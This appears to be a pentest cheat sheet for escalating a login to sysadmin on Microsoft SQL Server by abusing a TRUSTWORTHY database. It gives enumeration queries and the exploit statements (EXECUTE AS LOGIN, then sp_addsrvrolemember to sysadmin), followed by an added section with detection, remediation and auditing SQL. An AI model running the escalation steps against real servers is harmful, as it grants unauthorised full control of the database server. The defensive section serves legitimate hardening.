Operator On The Wire

Trustworthy Databases (MSSQL privilege escalation)

Enumerate

-- List every database with its owning login and whether TRUSTWORTHY is enabled
SELECT a.name AS [database], b.name AS [owner], a.is_trustworthy_on FROM sys.databases a JOIN sys.server_principals b ON a.owner_sid = b.sid;

Identify User

(looking for privileged database principals, e.g. members of db_owner, that we can impersonate)

-- Map role memberships to principals in the target database; replace DBNAME with the database from the previous step
USE DBNAME; SELECT b.name AS [role], c.name AS [member] FROM DBNAME.sys.database_role_members a JOIN DBNAME.sys.database_principals b ON a.role_principal_id = b.principal_id LEFT JOIN DBNAME.sys.database_principals c ON a.member_principal_id = c.principal_id;

Exploit

USE DB_GOES_HERE;
EXECUTE AS LOGIN = 'TARGET_USER'; -- switch execution context to the privileged login identified above

SELECT IS_ROLEMEMBER('db_owner'); -- verify: 1 means the impersonated context is db_owner here

EXEC sp_addsrvrolemember 'CONTROLLED_USER', 'sysadmin'; -- privesc: add the controlled login to the sysadmin server role

Verify

REVERT; -- drop the impersonated context
SELECT SYSTEM_USER; -- should show the original login again
SELECT IS_SRVROLEMEMBER('sysadmin'); -- 1 confirms the original login is now sysadmin
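Defensive companion to the enumeration above, added here and not part of the original page: it flags the exploitable combination (TRUSTWORTHY ON plus an owner who is sysadmin), shows the remediation, and sets up a server audit that records the role-membership and database-option changes this technique produces. The audit names, the file path and DB_GOES_HERE / LOW_PRIV_LOGIN are placeholders to replace.

```sql
-- Added defensive check (not from the original page).
-- A db_owner in a TRUSTWORTHY database can only reach sysadmin when the
-- database owner's login is itself sysadmin, so flag exactly that pairing.
SELECT d.name AS [database],
       sp.name AS [owner_login],
       d.is_trustworthy_on,
       IS_SRVROLEMEMBER('sysadmin', sp.name) AS owner_is_sysadmin
FROM sys.databases AS d
JOIN sys.server_principals AS sp ON d.owner_sid = sp.sid
WHERE d.is_trustworthy_on = 1
  AND IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
  AND d.name <> 'msdb';  -- msdb is TRUSTWORTHY by design; review it separately

-- Remediation for each flagged database (placeholder names):
-- turn the flag off unless the database genuinely needs it ...
ALTER DATABASE [DB_GOES_HERE] SET TRUSTWORTHY OFF;
-- ... and/or hand ownership to a low-privileged login so that
-- impersonating dbo no longer inherits sysadmin at the server level.
ALTER AUTHORIZATION ON DATABASE::[DB_GOES_HERE] TO [LOW_PRIV_LOGIN];

-- Detection: a server audit that captures sysadmin membership changes
-- (sp_addsrvrolemember / ALTER SERVER ROLE) and ALTER DATABASE calls
-- such as SET TRUSTWORTHY ON. Audit names and path are placeholders.
CREATE SERVER AUDIT [TrustworthyEscalationAudit]
    TO FILE (FILEPATH = 'C:\AuditLogs\');
CREATE SERVER AUDIT SPECIFICATION [TrackRoleAndDbChanges]
    FOR SERVER AUDIT [TrustworthyEscalationAudit]
    ADD (SERVER_ROLE_MEMBER_CHANGE_GROUP),
    ADD (DATABASE_CHANGE_GROUP),
    ADD (DATABASE_OWNERSHIP_CHANGE_GROUP)
    WITH (STATE = ON);
ALTER SERVER AUDIT [TrustworthyEscalationAudit] WITH (STATE = ON);
```

Run the SELECT on a schedule; any row it returns is a database where a db_owner member should be treated as a sysadmin-equivalent until the flag or the ownership is changed.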